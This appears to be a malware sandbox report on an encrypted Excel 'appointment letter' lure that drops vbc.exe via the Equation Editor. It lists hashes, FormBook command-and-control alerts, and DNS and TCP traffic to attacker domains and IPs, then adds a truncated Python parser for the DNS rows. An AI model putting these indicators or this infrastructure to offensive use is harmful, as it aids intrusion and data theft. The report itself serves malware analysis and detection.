                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....$_...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\xpwbfoj
                                                                                                                                                                                                    Process:C:\Users\Public\vbc.exe
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):56641
                                                                                                                                                                                                    Entropy (8bit):4.976767365562505
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:768:Y3DnyBc/8CaRs3+Z06O2vxZODPqSjlr7GBOEEjHzYtfgcBGUePl72zvHzUfysnp3:i4opae+Z0z0wr7G3EjT8cd72DUpGLu
                                                                                                                                                                                                    MD5:92B8B4963350C3A198E9513D086FBB3C
                                                                                                                                                                                                    SHA1:8B365235930D9864D7CA3D3A8B67E61D314EA560
                                                                                                                                                                                                    SHA-256:7CE31FC69C94A1917273EB7BF938EFB0BA57EDA5281E20BE8EF13E7D8BA302F9
                                                                                                                                                                                                    SHA-512:75C83B2DCE7EB57B059FA4C9C50A7F308CD2521868EB83011F15C51E96489C15E987D72B0907BF59698924140306D6348578BF114CABB0A0C1A86FC033FE02C1
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: U...........D.....E...B.F.....G.....H.....I.....J...?.K.....L.....M...v.N.....O.....P.....Q...?.R.....S...5.T.....U...p.V.....W.....X.....Y...7.Z.....[...P.\.....]...{.^....._...|.`.....a.....b.....c.....d...A.e.....f.....g...=.h.....i...T.j...7.k...1.l...|.m.....n...(.o.....p...?.q.....r...T.s...z.t.....u.....v...?.w.....x...T.y.....z...=.{.....|...T.}...?.~.........|...........=...........|.................{...........t.............................A.....9.............................=...........x.....7.....1.....t...........(...........?...........x.....z.................?...........x...........=...........x.....?...........t...........=...........t.................{...........l.............................A.....9.............................=...........p.....7.....1.....l...........(...........?...........p.....z.................?...........p
                                                                                                                                                                                                    C:\Users\user\Desktop\~$Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):330
                                                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                                                                                                                                                                                                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                                                                                                                                                                                                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                                                                                                                                                                                                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                                                                                                                                                                                                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                    C:\Users\Public\vbc.exe
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):225177
                                                                                                                                                                                                    Entropy (8bit):7.913752075626111
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:DQIURTXJ+MwMy2ZeD0EUquupJDoeGgFq+HAgDtI7LXZ2sQYvvlIieO82WbyXVvE4:Ds9wMReDph9AOI7LXosQQBBFsuyQUvnk
                                                                                                                                                                                                    MD5:116E736BA00FCA4B8499C4DF00796454
                                                                                                                                                                                                    SHA1:A8D3D62DB4BD49E24C2BDA3D0D81C3BE25A81DAE
                                                                                                                                                                                                    SHA-256:096CA35528EF4F702E93F5F17D7954F26FB48ACD4526794CE1EE99D27CF1A4C3
                                                                                                                                                                                                    SHA-512:02DDAB82DD68FAA0627C15320DE3E0B118B1CC95FEE80FC013E57ED773A9420AF5B23F3BB7F9CCAC216C88581B665DB29BD1CA5E03F7E0B52F9C542D75B57F78
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 28%
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i..iw..iu..i...i..id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type: CDFV2 Encrypted
Entropy (8bit): 7.995575769527791
TrID:
• Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx
File size: 1331416
MD5: 27211c2dc1809cc2ab4469ff246f9cb4
SHA1: 735918b9ed26c5eafa266305fcf677bd2ee5f0a2
SHA256: b4b855d04e706c33129c2db1c80d8b05497fa56a2288ef2fb4e631fe42aa781f
SHA512: 23b42410a678e708454869c32857a93e40a4d00a2a28afdd5e03a6b1de53c197c389d844c3dec7d7f3f62539d458091cc4ba1e163890978da566c42bb190c0f7
SSDEEP: 24576:LS5w5NLTHyglJ6nYEuTBj2cAOrnbmKpcCd+p/5I541u4pHq0n:LS5wjTHplJfEuTJ+qbmKBd+dEC
File Content Preview: ........................>...............................................................................................................z.......{.......~......................................................................................................

File Icon

Icon Hash: e4e2aa8aa4b4bcb4

Static OLE Info

General

Document Type: OLE
Number of OLE Files: 1

OLE File "Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx"

Indicators

Has Summary Info: False
Application Name: unknown
Encrypted Document: True
Contains Word Document Stream: False
Contains Workbook/Book Stream: False
Contains PowerPoint Document Stream: False
Contains Visio Document Stream: False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros: False

Streams

Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
General
Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
File Type: data
Stream Size: 64
Entropy: 2.73637206947
Base64 Encoded: False
Data ASCII: . . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
Data Raw: 08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
General
Stream Path: \x6DataSpaces/DataSpaceMap
File Type: data
Stream Size: 112
Entropy: 2.7597816111
Base64 Encoded: False
Data ASCII: . . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
Data Raw: 08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 208
General
Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
File Type: data
Stream Size: 208
Entropy: 3.35153409046
Base64 Encoded: False
Data ASCII: l . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . A E S 1 2 8 . . . . . . . . . . . . .
Data Raw: 6c 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
General
Stream Path: \x6DataSpaces/Version
File Type: data
Stream Size: 76
Entropy: 2.79079600998
Base64 Encoded: False
Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

Stream Path: EncryptedPackage, File Type: data, Stream Size: 1317080
General
Stream Path: EncryptedPackage
File Type: data
Stream Size: 1317080
Entropy: 7.99982695424
Base64 Encoded: True
Data ASCII: . . . . . . . . . . . / . . . . F . . . ; . W . . . 0 . 7 9 . . . . . . . . j k . . . . . . . : M . . . . B 9 3 F o . > . . y ' . . E j . , N . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W ^ . . . . x . . . h q . f r . W
Data Raw: ca 18 14 00 00 00 00 00 b4 ad 1b 2f eb 20 cc d6 85 46 d9 e3 99 3b d7 57 e5 96 17 30 c0 37 39 12 ea bf 1e bd 85 04 b7 6a 6b 9b 19 dd 87 e6 93 be 3a 4d 8a c2 c3 bf 42 39 33 46 6f ad 3e f3 b0 79 27 a5 09 45 6a 94 2c 4e 92 68 71 ee 66 72 c6 57 5e 87 08 c3 f9 78 02 af 92 68 71 ee 66 72 c6 57 5e 87 08 c3 f9 78 02 af 92 68 71 ee 66 72 c6 57 5e 87 08 c3 f9 78 02 af 92 68 71 ee 66 72 c6 57

Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
General
Stream Path: EncryptionInfo
File Type: data
Stream Size: 224
Entropy: 4.67936203517
Base64 Encoded: False
Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . @ . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . = . . = . . . e . . . . . . . . 6 . . . . f . { . . ( . . . . . . Q % . J . % . \\ . H . + . ] . . . . . . . c ` g . . . g . .
Data Raw: 03 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 40 98 b0 09 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/11/21-08:03:43.236814 | TCP | 2022550 | ET TROJAN Possible Malicious Macro DL EXE Feb 2016 | 49167 | 80 | 192.168.2.22 | 192.210.173.40
06/11/21-08:05:16.324655 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 217.70.184.50
06/11/21-08:05:16.324655 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 217.70.184.50
06/11/21-08:05:16.324655 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49168 | 80 | 192.168.2.22 | 217.70.184.50
06/11/21-08:05:26.602123 | TCP | 2031453 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 67.199.248.12
06/11/21-08:05:26.602123 | TCP | 2031449 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 67.199.248.12
06/11/21-08:05:26.602123 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 49169 | 80 | 192.168.2.22 | 67.199.248.12

Network Port Distribution

TCP Packets

                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838171959 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838176012 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838193893 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838196039 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838215113 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838217974 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838236094 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838238001 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838253021 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838254929 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838273048 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838275909 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838294029 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838294983 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838311911 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838314056 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838332891 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.838351965 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:43.843100071 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038254976 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038316011 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038357973 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038409948 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038455009 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038506031 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038568020 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038570881 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038629055 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038630962 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038690090 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038697958 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038746119 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038753033 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038786888 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038801908 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038851023 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038917065 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038959980 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.038979053 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039000988 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039026022 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039042950 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039060116 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039077997 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039094925 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039110899 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039150953 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039167881 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039190054 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039208889 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039226055 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039242983 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039259911 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039272070 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039284945 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039297104 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039315939 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039436102 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039474964 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039480925 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.039485931 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.043402910 CEST4916780192.168.2.22192.210.173.40
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.237402916 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.237484932 CEST8049167192.210.173.40192.168.2.22
                                                                                                                                                                                                    Jun 11, 2021 08:03:44.237519026 CEST8049167192.210.173.40192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 08:04:58.375984907 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:04:58.442483902 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:05:08.471185923 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:05:08.835160017 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:05:16.180650949 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:05:16.260540962 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:05:21.409224033 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:05:21.484855890 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jun 11, 2021 08:05:26.482148886 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jun 11, 2021 08:05:26.549051046 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 08:04:58.375984907 CEST | 192.168.2.22 | 8.8.8.8 | 0xccff | Standard query (0) | www.reufhroir.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:08.471185923 CEST | 192.168.2.22 | 8.8.8.8 | 0x2e78 | Standard query (0) | www.pholbhf.icu | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:16.180650949 CEST | 192.168.2.22 | 8.8.8.8 | 0x2f03 | Standard query (0) | www.spinecompanion.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:21.409224033 CEST | 192.168.2.22 | 8.8.8.8 | 0x3c4e | Standard query (0) | www.dr-farshidtajik.com | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:26.482148886 CEST | 192.168.2.22 | 8.8.8.8 | 0x6ec7 | Standard query (0) | www.doodstore.net | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 08:04:58.442483902 CEST | 8.8.8.8 | 192.168.2.22 | 0xccff | Name error (3) | www.reufhroir.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:08.835160017 CEST | 8.8.8.8 | 192.168.2.22 | 0x2e78 | Name error (3) | www.pholbhf.icu | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:16.260540962 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | www.spinecompanion.com | webredir.vip.gandi.net |  | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 08:05:16.260540962 CEST | 8.8.8.8 | 192.168.2.22 | 0x2f03 | No error (0) | webredir.vip.gandi.net |  | 217.70.184.50 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:21.484855890 CEST | 8.8.8.8 | 192.168.2.22 | 0x3c4e | Server failure (2) | www.dr-farshidtajik.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:26.549051046 CEST | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | www.doodstore.net | doodstore.net |  | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 08:05:26.549051046 CEST | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | doodstore.net |  | 67.199.248.12 | A (IP address) | IN (0x0001)
Jun 11, 2021 08:05:26.549051046 CEST | 8.8.8.8 | 192.168.2.22 | 0x6ec7 | No error (0) | doodstore.net |  | 67.199.248.13 | A (IP address) | IN (0x0001)
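The DNS tables are the most FormBook-like part of the capture: the sandbox host queries five unrelated domains in sequence within about thirty seconds, two return NXDOMAIN (Name error (3)), one SERVFAIL, and only two resolve. That pattern is what you get when FormBook walks its configured domain list, most of which is typically dead or decoy. The script below is an added example, not part of the sandbox report: it parses the query and answer rows exactly as the report renders them (columns fused with no separator), recovers the fields, follows the CNAME chains and applies a simple failure-ratio heuristic. Splitting two fused IPv4 literals is genuinely ambiguous ("192.168.2.22" + "8.8.8.8" versus "192.168.2.2" + "28.8.8.8"), so the parser takes the sandbox and resolver addresses from the UDP table as hints; likewise a fused Name/CName run is split against the names already seen in the queries. The thresholds in triage() are arbitrary values chosen for this example, not a published signature.

```python
import re
from collections import Counter

# Constructed sample input: the DNS Queries and DNS Answers rows exactly as the
# flattened report renders them, every column run together with no separator.
QUERY_ROWS = [
    "Jun 11, 2021 08:04:58.375984907 CEST192.168.2.228.8.8.80xccffStandard query (0)www.reufhroir.comA (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:08.471185923 CEST192.168.2.228.8.8.80x2e78Standard query (0)www.pholbhf.icuA (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:16.180650949 CEST192.168.2.228.8.8.80x2f03Standard query (0)www.spinecompanion.comA (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:21.409224033 CEST192.168.2.228.8.8.80x3c4eStandard query (0)www.dr-farshidtajik.comA (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:26.482148886 CEST192.168.2.228.8.8.80x6ec7Standard query (0)www.doodstore.netA (IP address)IN (0x0001)",
]
ANSWER_ROWS = [
    "Jun 11, 2021 08:04:58.442483902 CEST8.8.8.8192.168.2.220xccffName error (3)www.reufhroir.comnonenoneA (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:08.835160017 CEST8.8.8.8192.168.2.220x2e78Name error (3)www.pholbhf.icunonenoneA (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:16.260540962 CEST8.8.8.8192.168.2.220x2f03No error (0)www.spinecompanion.comwebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)",
    "Jun 11, 2021 08:05:16.260540962 CEST8.8.8.8192.168.2.220x2f03No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:21.484855890 CEST8.8.8.8192.168.2.220x3c4eServer failure (2)www.dr-farshidtajik.comnonenoneA (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:26.549051046 CEST8.8.8.8192.168.2.220x6ec7No error (0)www.doodstore.netdoodstore.netCNAME (Canonical name)IN (0x0001)",
    "Jun 11, 2021 08:05:26.549051046 CEST8.8.8.8192.168.2.220x6ec7No error (0)doodstore.net67.199.248.12A (IP address)IN (0x0001)",
    "Jun 11, 2021 08:05:26.549051046 CEST8.8.8.8192.168.2.220x6ec7No error (0)doodstore.net67.199.248.13A (IP address)IN (0x0001)",
]
# Hosts taken from the UDP table (sandbox VM and its resolver); they are the
# hint that disambiguates two concatenated IPv4 literals.
KNOWN_HOSTS = {"192.168.2.22", "8.8.8.8"}
RCODE_NAMES = {0: "NOERROR", 2: "SERVFAIL", 3: "NXDOMAIN"}

# Column boundaries are recoverable because hostnames are lower-case while the
# Type and Class columns start upper-case and the Trans ID starts with "0x".
QUERY_RE = re.compile(
    r"^(?P<ts>.+? CEST)(?P<ips>[0-9.]+)(?P<tid>0x[0-9a-f]+)"
    r"(?P<op>[A-Za-z ]+\((?P<opnum>\d+)\))(?P<name>[a-z0-9.-]+)"
    r"(?P<rtype>[A-Z]+ \([^)]*\))(?P<cls>[A-Z]+ \(0x[0-9a-f]+\))$")
ANSWER_RE = re.compile(  # Name, CName and Address are fused into one run
    r"^(?P<ts>.+? CEST)(?P<ips>[0-9.]+)(?P<tid>0x[0-9a-f]+)"
    r"(?P<rcode>[A-Za-z ]+\((?P<rcnum>\d+)\))(?P<names>[a-z0-9.-]+)"
    r"(?P<rtype>[A-Z]+ \([^)]*\))(?P<cls>[A-Z]+ \(0x[0-9a-f]+\))$")

def is_ipv4(s):
    parts = s.split(".")
    return len(parts) == 4 and all(
        p.isdigit() and (p == "0" or not p.startswith("0")) and int(p) <= 255 for p in parts)

def split_ips(blob, known=KNOWN_HOSTS):
    """Split e.g. '192.168.2.228.8.8.8'; several splits are valid IPv4 pairs,
    so keep the single one whose two halves are both known hosts."""
    cands = [(blob[:i], blob[i:]) for i in range(1, len(blob))
             if is_ipv4(blob[:i]) and is_ipv4(blob[i:])]
    hinted = [c for c in cands if c[0] in known and c[1] in known]
    if len(hinted) != 1:
        raise ValueError(f"ambiguous IP pair {blob!r}: {cands}")
    return hinted[0]

def parse_queries(rows):
    out = []
    for row in rows:
        m = QUERY_RE.match(row)
        if not m:
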